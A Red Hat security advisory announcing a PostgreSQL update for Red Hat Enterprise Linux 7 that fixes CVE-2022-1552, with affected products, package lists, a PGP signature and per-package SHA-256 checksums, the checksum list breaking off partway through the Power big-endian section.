Red Hat Security Advisory 2022-5162-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql security update  
Advisory ID:       RHSA-2022:5162-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5162  
Issue date:        2022-06-22  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for postgresql is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

ppc64:  
postgresql-9.2.24-8.el7_9.ppc.rpm  
postgresql-9.2.24-8.el7_9.ppc64.rpm  
postgresql-contrib-9.2.24-8.el7_9.ppc64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc64.rpm  
postgresql-docs-9.2.24-8.el7_9.ppc64.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc64.rpm  
postgresql-plperl-9.2.24-8.el7_9.ppc64.rpm  
postgresql-plpython-9.2.24-8.el7_9.ppc64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.ppc64.rpm  
postgresql-server-9.2.24-8.el7_9.ppc64.rpm  
postgresql-test-9.2.24-8.el7_9.ppc64.rpm

ppc64le:  
postgresql-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-contrib-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-docs-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-plperl-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-plpython-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-pltcl-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-server-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-test-9.2.24-8.el7_9.ppc64le.rpm

s390x:  
postgresql-9.2.24-8.el7_9.s390.rpm  
postgresql-9.2.24-8.el7_9.s390x.rpm  
postgresql-contrib-9.2.24-8.el7_9.s390x.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390x.rpm  
postgresql-devel-9.2.24-8.el7_9.s390.rpm  
postgresql-devel-9.2.24-8.el7_9.s390x.rpm  
postgresql-docs-9.2.24-8.el7_9.s390x.rpm  
postgresql-libs-9.2.24-8.el7_9.s390.rpm  
postgresql-libs-9.2.24-8.el7_9.s390x.rpm  
postgresql-plperl-9.2.24-8.el7_9.s390x.rpm  
postgresql-plpython-9.2.24-8.el7_9.s390x.rpm  
postgresql-pltcl-9.2.24-8.el7_9.s390x.rpm  
postgresql-server-9.2.24-8.el7_9.s390x.rpm  
postgresql-test-9.2.24-8.el7_9.s390x.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
postgresql-debuginfo-9.2.24-8.el7_9.ppc.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64.rpm  
postgresql-static-9.2.24-8.el7_9.ppc.rpm  
postgresql-static-9.2.24-8.el7_9.ppc64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.ppc64.rpm

ppc64le:  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-static-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-upgrade-9.2.24-8.el7_9.ppc64le.rpm

s390x:  
postgresql-debuginfo-9.2.24-8.el7_9.s390.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390x.rpm  
postgresql-static-9.2.24-8.el7_9.s390.rpm  
postgresql-static-9.2.24-8.el7_9.s390x.rpm  
postgresql-upgrade-9.2.24-8.el7_9.s390x.rpm

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrMEj9zjgjWX9erEAQj9sg/+JJTtnNpHK5fwayt4VFgiXyCwSfGVZ5Sq  
tvXRsOZWS6IyDLtZMLoh4QGPKGa3QxPZzMS8ANtQwv7zI/T5YaSvwE2ynJWsMWPq  
Keb8GKLzFTd1vHOYxD8YWmGsKBUJrXKZSbe6PmTVeIkVE4kJ8AGNUQhdGmrXWzo6  
KQeCjiG4pqxAYagoDLEKF3vI1K290cOghBFYk+N4zf2dtM0kU6fBn46XTOvNZyHK  
7B5j4Zh50PbZurxDxHlQh7cjSIVAg3WwHd/je2DpIWLBqycAmgS2KKmMapNv8eiw  
mwQucIzZ3cPYv8olGR5vAcOESLStDsivwgQgMaVWApOleFVn9la/UnQKQjhW7gum  
9kJTL0tdeu8lXMYdzdpDu9wmbigD5b/vwNStC0fxOadfTcTQ2HA0MR+W/H7xx0WH  
p8Pv5yGRwTDkVZCa5cMrd957h84BYbZTogSgpTzJYrj5+/rSfRBr4DDbFI5rfVzH  
GJ8RApH2qndPkq7AjqkQYg7w5x5a+rMzXXOMocvldo+XZamGOIkbjzGwNi5zKVOY  
LtBcQ8X1VnSFZK7ivHvvgyA7hTP0+EZEMuQZ3FyJKmZCaoFx4ikYTkbnpEiqgWyM  
BNPMQB25syypAvXovJY2RxEcLNaWLXLHxDZaI+NBPrRAUPWdPwrOxTaL4lROHTym  
DE8OJwR8B98=ncdG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5162-01

An update for postgresql is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-1552: postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox


**Synopsis**

Important: postgresql security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for postgresql is now available for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

PostgreSQL is an advanced object-relational database management system (DBMS).  

Security Fix(es):  

*   postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted after installing this update.

**Affected Products**

*   Red Hat Enterprise Linux Server 7 x86\_64
*   Red Hat Enterprise Linux Workstation 7 x86\_64
*   Red Hat Enterprise Linux Desktop 7 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 7 s390x
*   Red Hat Enterprise Linux for Power, big endian 7 ppc64
*   Red Hat Enterprise Linux for Scientific Computing 7 x86\_64
*   Red Hat Enterprise Linux for Power, little endian 7 ppc64le

**Fixes**

*   BZ - 2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

**Red Hat Enterprise Linux Server 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

x86\_64

postgresql-9.2.24-8.el7\_9.i686.rpm

SHA-256: f75e69d7b581e0e0900847d9d03ec5197c0ba439d4e2b5d505c826f991c731ff

postgresql-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 25e6031f1db68adae171dd770312cbb0e159027c424686465fb71d3de2897455

postgresql-contrib-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f366587793acea03272f9f209f3536de41a886b68ad4f0b1e42a7de2f35f9f68

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-devel-9.2.24-8.el7\_9.i686.rpm

SHA-256: 346157bc04520d78348b279fbe2d58d8a70241c1cd9d12fd5644a8e860505df1

postgresql-devel-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f4fda1a21c23825fc6054bc3bd182aaa776e0d83ea36fbed4f0a3ded69b89f88

postgresql-docs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: e1f63d369ca685c4113dfba36184cf7a916d4890f504251ddfd641b5b60e04c5

postgresql-libs-9.2.24-8.el7\_9.i686.rpm

SHA-256: ed9a3875ea18b8ee2edb25ee984417c3a4f9738cbb92ab91e49beb9c4728eeea

postgresql-libs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: aed7a9ab1b4612f3740e95ea39e703e51d3e901b3ab172884556298a8044274d

postgresql-plperl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 45fc73cff40ede890418eaf40632d32261be52087785f9c57879b446f38f396d

postgresql-plpython-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 42d9ca3c8b6ef4f99281a3d231be6aaa15cc46d04ee1e89411fafd66259d487c

postgresql-pltcl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 62b4a33524643d4aa09a00e1522bcbfc517bef0e08652db7f98148c4cd17ec93

postgresql-server-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: bc9807f250a68d809ada1366478cdfdef4faa50602440b7f5f4cb0b0fa61666b

postgresql-static-9.2.24-8.el7\_9.i686.rpm

SHA-256: a60143859d1ff960530a2541de3c2cc62c3e215a51627534b0327710a99e6bbc

postgresql-static-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 735b560b101fa676594b261a812581ddf81404b92c92dc66091c78eb8478924c

postgresql-test-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 08700ec5989a22a08c54dd0d9856f8db1c53c2b8775f4113f996b13607136ce0

postgresql-upgrade-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 9a9898c1b60eb2ce19b98f3a39b3ab0b5c4cce0ae8bf248cb1ceb3cf6c916f0f

**Red Hat Enterprise Linux Workstation 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

x86\_64

postgresql-9.2.24-8.el7\_9.i686.rpm

SHA-256: f75e69d7b581e0e0900847d9d03ec5197c0ba439d4e2b5d505c826f991c731ff

postgresql-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 25e6031f1db68adae171dd770312cbb0e159027c424686465fb71d3de2897455

postgresql-contrib-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f366587793acea03272f9f209f3536de41a886b68ad4f0b1e42a7de2f35f9f68

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-devel-9.2.24-8.el7\_9.i686.rpm

SHA-256: 346157bc04520d78348b279fbe2d58d8a70241c1cd9d12fd5644a8e860505df1

postgresql-devel-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f4fda1a21c23825fc6054bc3bd182aaa776e0d83ea36fbed4f0a3ded69b89f88

postgresql-docs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: e1f63d369ca685c4113dfba36184cf7a916d4890f504251ddfd641b5b60e04c5

postgresql-libs-9.2.24-8.el7\_9.i686.rpm

SHA-256: ed9a3875ea18b8ee2edb25ee984417c3a4f9738cbb92ab91e49beb9c4728eeea

postgresql-libs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: aed7a9ab1b4612f3740e95ea39e703e51d3e901b3ab172884556298a8044274d

postgresql-plperl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 45fc73cff40ede890418eaf40632d32261be52087785f9c57879b446f38f396d

postgresql-plpython-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 42d9ca3c8b6ef4f99281a3d231be6aaa15cc46d04ee1e89411fafd66259d487c

postgresql-pltcl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 62b4a33524643d4aa09a00e1522bcbfc517bef0e08652db7f98148c4cd17ec93

postgresql-server-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: bc9807f250a68d809ada1366478cdfdef4faa50602440b7f5f4cb0b0fa61666b

postgresql-static-9.2.24-8.el7\_9.i686.rpm

SHA-256: a60143859d1ff960530a2541de3c2cc62c3e215a51627534b0327710a99e6bbc

postgresql-static-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 735b560b101fa676594b261a812581ddf81404b92c92dc66091c78eb8478924c

postgresql-test-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 08700ec5989a22a08c54dd0d9856f8db1c53c2b8775f4113f996b13607136ce0

postgresql-upgrade-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 9a9898c1b60eb2ce19b98f3a39b3ab0b5c4cce0ae8bf248cb1ceb3cf6c916f0f

**Red Hat Enterprise Linux Desktop 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

x86\_64

postgresql-9.2.24-8.el7\_9.i686.rpm

SHA-256: f75e69d7b581e0e0900847d9d03ec5197c0ba439d4e2b5d505c826f991c731ff

postgresql-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 25e6031f1db68adae171dd770312cbb0e159027c424686465fb71d3de2897455

postgresql-contrib-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f366587793acea03272f9f209f3536de41a886b68ad4f0b1e42a7de2f35f9f68

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-devel-9.2.24-8.el7\_9.i686.rpm

SHA-256: 346157bc04520d78348b279fbe2d58d8a70241c1cd9d12fd5644a8e860505df1

postgresql-devel-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f4fda1a21c23825fc6054bc3bd182aaa776e0d83ea36fbed4f0a3ded69b89f88

postgresql-docs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: e1f63d369ca685c4113dfba36184cf7a916d4890f504251ddfd641b5b60e04c5

postgresql-libs-9.2.24-8.el7\_9.i686.rpm

SHA-256: ed9a3875ea18b8ee2edb25ee984417c3a4f9738cbb92ab91e49beb9c4728eeea

postgresql-libs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: aed7a9ab1b4612f3740e95ea39e703e51d3e901b3ab172884556298a8044274d

postgresql-plperl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 45fc73cff40ede890418eaf40632d32261be52087785f9c57879b446f38f396d

postgresql-plpython-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 42d9ca3c8b6ef4f99281a3d231be6aaa15cc46d04ee1e89411fafd66259d487c

postgresql-pltcl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 62b4a33524643d4aa09a00e1522bcbfc517bef0e08652db7f98148c4cd17ec93

postgresql-server-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: bc9807f250a68d809ada1366478cdfdef4faa50602440b7f5f4cb0b0fa61666b

postgresql-static-9.2.24-8.el7\_9.i686.rpm

SHA-256: a60143859d1ff960530a2541de3c2cc62c3e215a51627534b0327710a99e6bbc

postgresql-static-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 735b560b101fa676594b261a812581ddf81404b92c92dc66091c78eb8478924c

postgresql-test-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 08700ec5989a22a08c54dd0d9856f8db1c53c2b8775f4113f996b13607136ce0

postgresql-upgrade-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 9a9898c1b60eb2ce19b98f3a39b3ab0b5c4cce0ae8bf248cb1ceb3cf6c916f0f

**Red Hat Enterprise Linux for IBM z Systems 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

s390x

postgresql-9.2.24-8.el7\_9.s390.rpm

SHA-256: 399551d5e6c77d223665a8e99489bda5edf49e0f438d5c8028e0302bce1353f5

postgresql-9.2.24-8.el7\_9.s390x.rpm

SHA-256: e963422046c5c272c04becf1e5c27c7acb34477c29c31c1ad921105dd8f9a664

postgresql-contrib-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 80df9080e7966662d63189f96d2be4c37a8b89bf988f2b40240be857883d2ab9

postgresql-debuginfo-9.2.24-8.el7\_9.s390.rpm

SHA-256: ae66b96471cf51b2385f09430a58dbf0a536c9e3034e364a998604c01058f188

postgresql-debuginfo-9.2.24-8.el7\_9.s390.rpm

SHA-256: ae66b96471cf51b2385f09430a58dbf0a536c9e3034e364a998604c01058f188

postgresql-debuginfo-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 81f901d80605d507301cddca64cfef18cbba778f5052a4aa8467105acb17a1ef

postgresql-debuginfo-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 81f901d80605d507301cddca64cfef18cbba778f5052a4aa8467105acb17a1ef

postgresql-devel-9.2.24-8.el7\_9.s390.rpm

SHA-256: c0e9f13b6d50c64f017dca458999f9ab18426c4cbe5132888f8dad5682261c65

postgresql-devel-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 57f56bf8857a0c661ae164672d25185f5b718b76f00e750901809822d7a0d261

postgresql-docs-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 420dcf17dabbffab69af1fc1d9fe895f57705b1f240bb339718733d4f0fc4d22

postgresql-libs-9.2.24-8.el7\_9.s390.rpm

SHA-256: 9b65df0170411009fb6ba984da42c50042d5af1512b422b5aae05b11c5a430a0

postgresql-libs-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 91446e4a201417ad4df537db14fe76ed1c5c60c07104ab8d71a4c6a5bfab96e8

postgresql-plperl-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 5ba37560631b8bc3b852e8505ad3e2500aa87eee4335b364d031410e10dbf018

postgresql-plpython-9.2.24-8.el7\_9.s390x.rpm

SHA-256: be27eff3fee7f1bb46824d9371a27f9be74bf9317ec0b5241f0cf54059e93d58

postgresql-pltcl-9.2.24-8.el7\_9.s390x.rpm

SHA-256: f3197265c6799f159a0ec5e19a8af42840e0f5b898f22b9af12af3b55189d96e

postgresql-server-9.2.24-8.el7\_9.s390x.rpm

SHA-256: d885fb89269414ede4461b747cd7dbcdb3829eb67fd853e793688accaa467c48

postgresql-static-9.2.24-8.el7\_9.s390.rpm

SHA-256: 894818c4dbcb11a524683e5c42b128727469b159388194eb82464d33e7e879ae

postgresql-static-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 4764b828419cf94bbc1a84edcad7b83bc9854ef7586f7987613cc5f230d5db39

postgresql-test-9.2.24-8.el7\_9.s390x.rpm

SHA-256: 9f2c04e5ec6bb75cdd74927191e8663967989f842e166d89e9079dd2a1491808

postgresql-upgrade-9.2.24-8.el7\_9.s390x.rpm

SHA-256: dcfca10210885e967a710bfe53ae5029d332ba6e776e6a499355b7715fb00f05

**Red Hat Enterprise Linux for Power, big endian 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

ppc64

postgresql-9.2.24-8.el7\_9.ppc.rpm

SHA-256: 1a0c2eade640141fab30486b6350a0f526a06df8019fee0e6ff23bf9843548d7

postgresql-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: f48df9ce62e8fdcb0668095085bee0c07b982552efcb6ffdc7c28ac2ca4489f2

postgresql-contrib-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: fb838b01449f52cb249874beda8d9fdb51933ed4fabec8665d9314ca68d04132

postgresql-debuginfo-9.2.24-8.el7\_9.ppc.rpm

SHA-256: 9583c24adebe4a9e678a4837cd02c5cab3144d6aac8a205dd6e0e4c8cb24f2da

postgresql-debuginfo-9.2.24-8.el7\_9.ppc.rpm

SHA-256: 9583c24adebe4a9e678a4837cd02c5cab3144d6aac8a205dd6e0e4c8cb24f2da

postgresql-debuginfo-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: c250da1b25c6eeb522da44a559b1f52a316abac88e304ec7343b8b0b2ac39c89

postgresql-debuginfo-9.2.24-8.el7\_9.ppc64.rpm

